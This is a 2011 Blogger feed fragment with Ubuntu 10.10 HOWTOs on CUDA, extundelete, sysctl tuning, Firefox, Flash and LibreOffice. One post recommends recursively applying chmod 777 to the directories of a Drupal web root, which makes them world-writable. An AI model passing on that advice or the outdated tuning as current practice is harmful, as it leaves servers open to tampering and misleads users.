That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-2524887022439226620?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/2524887022439226620'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/2524887022439226620'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/04/howto-nvidia-cuda-40-rc-on-ubuntu.html' title='HOWTO : nVidia CUDA 4.0 RC on Ubuntu 10.10 Server'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5491166408786386473</id><published>2011-04-23T20:22:00.025+08:00</published><updated>2011-05-03T09:40:06.713+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CUDA'/><category scheme='http://www.blogger.com/atom/ns#' term='nVidia'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : nVidia CUDA 4.0 RC on Ubuntu 10.10 Desktop</title><content type='html'>If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA 4.0 RC on Ubuntu 10.10 Desktop.&lt;br /&gt;
&lt;br /&gt;
You will experience a faster desktop after the installation of CUDA 4.0. Meanwhile, if you installed SMPlayer, you can playback 1080p videos with the help of vdpau.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Add the CUDA 4.0 PPA.&lt;br /&gt;
&lt;code&gt;sudo add-apt-repository ppa:aaron-haviland/cuda-4.0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get upgrade&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;64-bit :&lt;/u&gt;&lt;br /&gt;
&lt;code&gt;sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc nvidia-current-modaliases libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev  nvidia-current-dev nvidia-cuda-dev nvidia-kernel-common opencl-headers&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;32-bit :&lt;/u&gt;&lt;br /&gt;
&lt;code&gt;sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc nvidia-current-modaliases lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev nvidia-kernel-common opencl-headers&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2a :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you do not have any nVidia driver installed before, you need to do the following command.  Otherwise, this step is not required at all.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nvidia-xconfig&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Reboot your system.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To install SMPlayer.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install smplayer smplayer-translations smplayer-themes&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then set it to use "&lt;code&gt;vdpau&lt;/code&gt;" at "&lt;code&gt;Output Driver&lt;/code&gt;" at "&lt;code&gt;Preference&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 - Compiling of nVidia CUDA sample codes (Optional)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Some sample codes at gpucomputingsdk_4.0.13_linux.run cannot be compiled successfully.  However, I would like to share how I compile some of them.&lt;br /&gt;
&lt;br /&gt;
(a) Install the gupcomputingsdk with the following command and accepted the default setting that it provides.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install freeglut3-dev libxi-dev libXmu-dev&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Go to the following link :&lt;br /&gt;
&lt;code&gt;http://developer.nvidia.com/cuda-toolkit-40#Linux&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;wget http://developer.download.nvidia.com/compute/cuda/4_0_rc2/sdk/gpucomputingsdk_4.0.13_linux.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo chmod +x gpucomputingsdk_4.0.13_linux.run&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;sh gpucomputingsdk_4.0.13_linux.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strike&gt;(b) Set the environment :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/environment&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following at the end of the entry.   &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;:/usr/lib/nvidia-current:/usr/lib/nvidia-cuda-toolkit&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;source /etc/environment&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
(b1) Set LD_LIBRARY_PATH :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/ld.so.conf.d/cuda.conf&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following lines to the file.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/usr/lib/nvidia-current&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;/usr/lib/nvidia-cuda-toolkit&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo ldconfig&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
(b2) Create a softlink of libcuda.so :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo ln -s /usr/lib/nvidia-current/libcuda.so /usr/lib/&lt;br /&gt;
sudo ln -s /usr/lib/nvidia-current/libcuda.so.1 /usr/lib/&lt;/code&gt;&lt;br /&gt;
&lt;/strike&gt;&lt;br /&gt;
(c) Make softlink to the /usr/include/thrust :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo mkdir /usr/lib/include&lt;br /&gt;
sudo ln -s /usr/include/thrust /usr/lib/include/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
(c1) Add the path of new location of thrust to the &lt;code&gt;common/common.mk&lt;/code&gt; :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Go to line 64 and add "&lt;code&gt;-I/usr/lib/include&lt;/code&gt;" :&lt;br /&gt;
&lt;br /&gt;
Change from -&lt;br /&gt;
&lt;code&gt;INCLUDES  += -I. -I$(CUDA_INSTALL_PATH)/include -I$(COMMONDIR)/inc -I$(SHAREDDIR)/inc&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Change to -&lt;br /&gt;
&lt;code&gt;INCLUDES  += -I. -I$(CUDA_INSTALL_PATH)/include -I/usr/lib/include -I$(COMMONDIR)/inc -I$(SHAREDDIR)/inc&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
(d) Compiling of the sample code :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd NVIDIA_GPU_computing_SDK/C&lt;br /&gt;
make&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
The executable sample codes will be situated at &lt;code&gt;~/NVIDIA_GPU_Computing_SDK/C/bin/linux/release/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Run the sample codes as the following, e.g. nbody and deviceQuery :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;./nbody&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;./deviceQuery&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
(e) According to the developer of the PPA, this issue &lt;strike&gt;(Step 5(b) to Step 5(c1))&lt;/strike&gt; (Step 5(c) to Step 5(c1)) may be caused by the SDK itself and nvcc compiler.  However, if you install the official SDK, there is no such problem.&lt;br /&gt;
&lt;br /&gt;
***(f) The CUDA 4.0 PPA just updated today (April 26, 2011 GMT+8) and it solved the Step 5(b) to Step 5(b2) problem.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5491166408786386473?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5491166408786386473'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5491166408786386473'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/04/howto-nvidia-cuda-40-rc-on-ubuntu-1010.html' title='HOWTO : nVidia CUDA 4.0 RC on Ubuntu 10.10 Desktop'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5202105649100266081</id><published>2011-04-21T18:12:00.002+08:00</published><updated>2011-04-21T18:21:24.246+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='checkinstall'/><category scheme='http://www.blogger.com/atom/ns#' term='extundelete'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : Undelete files and directories on Ubuntu</title><content type='html'>&lt;a href="http://extundelete.sourceforge.net/"&gt;extundelete&lt;/a&gt; is a utility that can recover deleted files from an ext3 or ext4 partition.&lt;br /&gt;
&lt;br /&gt;
Hereby, I am going to show to how to compile and install this utility from source on Ubuntu 10.10.  The current version of extundelete is 0.2.0 at this time of writing.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get upgrade&lt;br /&gt;
sudo apt-get install build-essential libtool e2fslibs-dev autoconf automake autotools-dev m4 e2fslibs e2fsprogs&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;wget http://sourceforge.net/projects/extundelete/files/extundelete/0.2.0/extundelete-0.2.0.tar.bz2/download&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xvjf extundelete-0.2.0.tar.bz2&lt;br /&gt;
cd extundelete-0.2.0&lt;br /&gt;
./autogen.sh&lt;br /&gt;
./configure&lt;br /&gt;
make&lt;br /&gt;
sudo make install&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1a : (Alternative)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you want to generate a debian installable file instead of install from source, you can use this step.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get upgrade&lt;br /&gt;
sudo apt-get install build-essential libtool e2fslibs-dev autoconf automake autotools-dev m4 e2fslibs e2fsprogs checkinstall&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;wget http://sourceforge.net/projects/extundelete/files/extundelete/0.2.0/extundelete-0.2.0.tar.bz2/download&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xvjf extundelete-0.2.0.tar.bz2&lt;br /&gt;
cd extundelete-0.2.0&lt;br /&gt;
./autogen.sh&lt;br /&gt;
./configure&lt;br /&gt;
make&lt;br /&gt;
sudo checkinstall&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Follow the instruction on screen to complete the debian executable file generation.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo dpkg -i extundelete_0.2.0-1_amd64.deb&lt;/code&gt;&lt;br /&gt;
or&lt;br /&gt;
&lt;code&gt;sudo dpkg -i extundelete_0.2.0-1_i386.deb&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Usage :&lt;br /&gt;
&lt;br /&gt;
Help -&lt;br /&gt;
&lt;code&gt;extundelete --help&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
To undelete test.png file at /dev/sda3 and /home/samiux -&lt;br /&gt;
&lt;code&gt;extundelete /dev/sda3 --restore-file /home/samiux/test.png&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
To undelete test directory at /dev/sda3 and /home/samiux -&lt;br /&gt;
&lt;code&gt;extundelete /dev/sda3 --restore-directory /home/samiux/test&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
To undelete all files and directories at /dev/sda3 -&lt;br /&gt;
&lt;code&gt;extundelete /dev/sda3 --restore-all&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5202105649100266081?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5202105649100266081'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5202105649100266081'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/04/howto-undelete-files-and-directories-on.html' title='HOWTO : Undelete files and directories on Ubuntu'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-879866611986443987</id><published>2011-04-19T12:34:00.000+08:00</published><updated>2011-04-19T12:34:05.577+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='chmod'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : Change mode of files and directories in batch</title><content type='html'>To change the mode to 777 for all directories under &lt;code&gt;/var/www/drupal&lt;/code&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo find /var/www/drupal/*/ -type d -exec chmod 777 {} \;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
To drop the execution rights of the all files under &lt;code&gt;/var/www&lt;/code&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo find /var/www -type f -exec chmod -x {} \;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-879866611986443987?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/879866611986443987'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/879866611986443987'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/04/howto-change-mode-of-files-and.html' title='HOWTO : Change mode of files and directories in batch'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-3199955710869061851</id><published>2011-04-19T12:25:00.007+08:00</published><updated>2011-06-07T17:51:36.838+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='remount'/><category scheme='http://www.blogger.com/atom/ns#' term='sysctl'/><category scheme='http://www.blogger.com/atom/ns#' term='noatime'/><category scheme='http://www.blogger.com/atom/ns#' term='mount'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : Performance tuning on Ubuntu</title><content type='html'>This tutorial can be applied to Desktop and Server.  Make sure you have at least 512MB RAM on your system beofre doing so.  &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/sysctl.conf&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following lines at the end of the file.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;kernel.sem = 250 32000 100 128&lt;br /&gt;
kernel.shmall = 2097152&lt;br /&gt;
kernel.shmmax = 2147483648&lt;br /&gt;
kernel.shmmni = 4096&lt;br /&gt;
# If you have more than 512MB RAM, use this setting (uncomment it and comment the setting just below)&lt;br /&gt;
fs.file-max = 262140&lt;br /&gt;
# If you have 512MB RAM or less, use this setting&lt;br /&gt;
#fs.file-max = 65535&lt;br /&gt;
vm.swappiness = 1&lt;br /&gt;
vm.vfs_cache_pressure = 50&lt;br /&gt;
vm.min_free_kbytes = 65536&lt;br /&gt;
&lt;br /&gt;
net.core.rmem_default = 33554432&lt;br /&gt;
net.core.rmem_max = 33554432&lt;br /&gt;
net.core.wmem_default = 33554432&lt;br /&gt;
net.core.wmem_max = 33554432&lt;br /&gt;
net.ipv4.tcp_rmem = 10240 87380 33554432&lt;br /&gt;
net.ipv4.tcp_wmem = 10240 87380 33554432&lt;br /&gt;
net.ipv4.tcp_no_metrics_save = 1&lt;br /&gt;
net.ipv4.tcp_window_scaling = 1&lt;br /&gt;
#net.ipv4.tcp_timestamps = 1&lt;br /&gt;
#net.ipv4.tcp_sack = 1&lt;br /&gt;
#net.core.netdev_max_backlog = 5000&lt;br /&gt;
#net.ipv4.tcp_mem = 786432 1048576 26777216&lt;br /&gt;
net.ipv4.ip_local_port_range = 1024 65535&lt;br /&gt;
net.ipv4.tcp_max_tw_buckets = 360000&lt;br /&gt;
&lt;br /&gt;
net.ipv4.tcp_max_orphans = 3276800&lt;br /&gt;
net.ipv4.tcp_tw_reuse = 1&lt;br /&gt;
net.ipv4.tcp_tw_recycle = 1&lt;br /&gt;
net.ipv4.tcp_syn_retries = 2&lt;br /&gt;
net.ipv4.tcp_synack_retries = 2&lt;br /&gt;
net.core.somaxconn = 32768&lt;br /&gt;
net.core.netdev_max_backlog = 32768&lt;br /&gt;
net.ipv4.tcp_max_syn_backlog = 65536&lt;br /&gt;
net.ipv4.tcp_mem = 94500000 915000000 927000000&lt;br /&gt;
net.ipv4.tcp_timestamps = 0&lt;br /&gt;
net.ipv4.tcp_fin_timeout = 15&lt;br /&gt;
#net.ipv4.tcp_sack = 0&lt;br /&gt;
net.ipv4.tcp_orphan_retries = 2&lt;br /&gt;
net.ipv4.conf.all.accept_redirects = 0&lt;br /&gt;
net.ipv4.conf.default.accept_redirects = 0&lt;br /&gt;
net.ipv4.conf.all.secure_redirects = 0&lt;br /&gt;
net.ipv4.conf.default.secure_redirects = 0&lt;br /&gt;
net.ipv4.conf.all.log_martians = 1&lt;br /&gt;
net.ipv4.conf.default.log_martians = 1&lt;br /&gt;
net.ipv4.conf.all.accept_source_route = 0&lt;br /&gt;
net.ipv4.conf.default.accept_source_route = 0&lt;br /&gt;
net.ipv4.conf.all.rp_filter = 1&lt;br /&gt;
net.ipv4.conf.default.rp_filter = 1&lt;br /&gt;
net.ipv4.tcp_syncookies = 1&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Save and perform the following command.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo /sbin/sysctl -p&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/rc.local&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Insert the following lines just before "&lt;code&gt;exit 0&lt;/code&gt;".  This requires to reboot the system to make it works.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;echo 1024 &gt; /sys/block/sda/queue/read_ahead_kb&lt;br /&gt;
echo 256 &gt; /sys/block/sda/queue/nr_requests&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To do the following step is in your own risk.  It works for &lt;code&gt;ext4&lt;/code&gt; only.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/fstab&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
add "&lt;code&gt;discard,norelatime,noatime&lt;/code&gt;" just before "&lt;code&gt;errors=remount-ro&lt;/code&gt;" and "&lt;code&gt;defaults&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
If there is any problem or error when applying the commands, please do not reboot the system.  Correct the problem or typo before reboot.  Otherwise, your system cannot be reboot.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo mount -a&lt;br /&gt;
sudo mount -o remount /&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
You can now reboot your system if there is no error at Step 3.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-3199955710869061851?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3199955710869061851'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3199955710869061851'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/04/howto-performance-tuning-on-ubuntu.html' title='HOWTO : Performance tuning on Ubuntu'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-8450182815168977733</id><published>2011-04-01T21:08:00.002+08:00</published><updated>2011-04-01T21:10:58.562+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Flash'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : Latest Adobe Flash for 64-bit Ubuntu 10.10</title><content type='html'>When you upgraded your Firefox to version 4 on your 64-bit Ubuntu as per this &lt;a href="http://samiux.blogspot.com/2011/03/howto-upgrade-to-firefox-4-on-ubuntu.html"&gt;tutorial&lt;/a&gt;, you may find that the flash is operating abnormally.  Now, we can fix this by installing the latest Flash from PPA.  &lt;br /&gt;
&lt;br /&gt;
As I do not have any 32-bit system, I do not know what happen to 32-bit when Firefox is upgraded to version 4.&lt;br /&gt;
&lt;br /&gt;
Your 32-bit version of Flash will be uninstalled automatically from your 64-bit system.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo add-apt-repository ppa:sevenmachines/flash&lt;br /&gt;
sudo apt-get update&lt;br /&gt;
sudo apt-get install flashplugin64-installer&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-8450182815168977733?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8450182815168977733'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8450182815168977733'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/04/howto-latest-adobe-flash-for-64-bit.html' title='HOWTO : Latest Adobe Flash for 64-bit Ubuntu 10.10'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-3590129607701356412</id><published>2011-03-31T18:43:00.000+08:00</published><updated>2011-03-31T18:43:15.829+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><category scheme='http://www.blogger.com/atom/ns#' term='Firefox'/><title type='text'>HOWTO : Upgrade to Firefox 4 on Ubuntu 10.10</title><content type='html'>Firefox 4 is released recently.  It also works on Ubuntu 10.10.  You can upgrade it from PPA.  Be keep in mind that some of the add-ons are not compatible with Firefox 4 at the moment.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo add-apt-repository ppa:mozillateam/firefox-stable&lt;br /&gt;
sudo apt-get update &lt;br /&gt;
sudo apt-get upgrade&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-3590129607701356412?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3590129607701356412'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3590129607701356412'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/03/howto-upgrade-to-firefox-4-on-ubuntu.html' title='HOWTO : Upgrade to Firefox 4 on Ubuntu 10.10'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-3430543506518623365</id><published>2011-03-26T19:38:00.007+08:00</published><updated>2011-03-26T22:32:40.086+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><category scheme='http://www.blogger.com/atom/ns#' term='LibreOffice'/><title type='text'>HOWTO : LibreOffice 3.3 on Ubuntu 10.10</title><content type='html'>OpenOffice is now owned by Oracle.  The development team of previous OpenOffice reformed and developed LibreOffice for the replacement.  You can use LibreOffice as the alternative.  LibreOffice is faster and more powerful.&lt;br /&gt;
&lt;br /&gt;
Be keep in mind that OpenOffice will be uninstalled automatically when you install LibreOffice.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo add-apt-repository ppa:libreoffice/ppa&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install libreoffice-gtk libreoffice-gnome libreoffice-pdfimport libreoffice-officebean libreoffice-ogltrans libreoffice-wiki-publisher libreoffice-core libreoffice-mysql-connector libreoffice-base-core libreoffice-style-andromeda libreoffice-calc libreoffice-draw libreoffice-impress libreoffice-writer libreoffice-math  libreoffice-common libreoffice-emailmerge libreoffice-l10n-common libreoffice-dtd-officedocument1.0 libreoffice-report-builder-bin libreoffice-style-hicontrast libreoffice-base libreoffice-java-common libreoffice-style-galaxy libreoffice-report-builder ttf-opensymbol libreoffice-presentation-minimizer libreoffice-style-crystal libreoffice-style-oxygen libreoffice-filter-mobiledev mozilla-libreoffice libreoffice-style-human libreoffice-style-tango python-uno ure uno-libs3 libreoffice-help-en-us&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 : (Optional)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The following will install Traditional Chinese and Simplified Chinese.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install libreoffice-l10n-zh-cn libreoffice-l10n-zh-tw libreoffice-help-zh-cn libreoffice-help-zh-tw&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 : (Optional)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you are using Kubuntu, install the following instead of &lt;code&gt;libreoffice-gnome&lt;/code&gt; and &lt;code&gt;libreoffice-gtk&lt;/code&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install libreoffice-kde&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
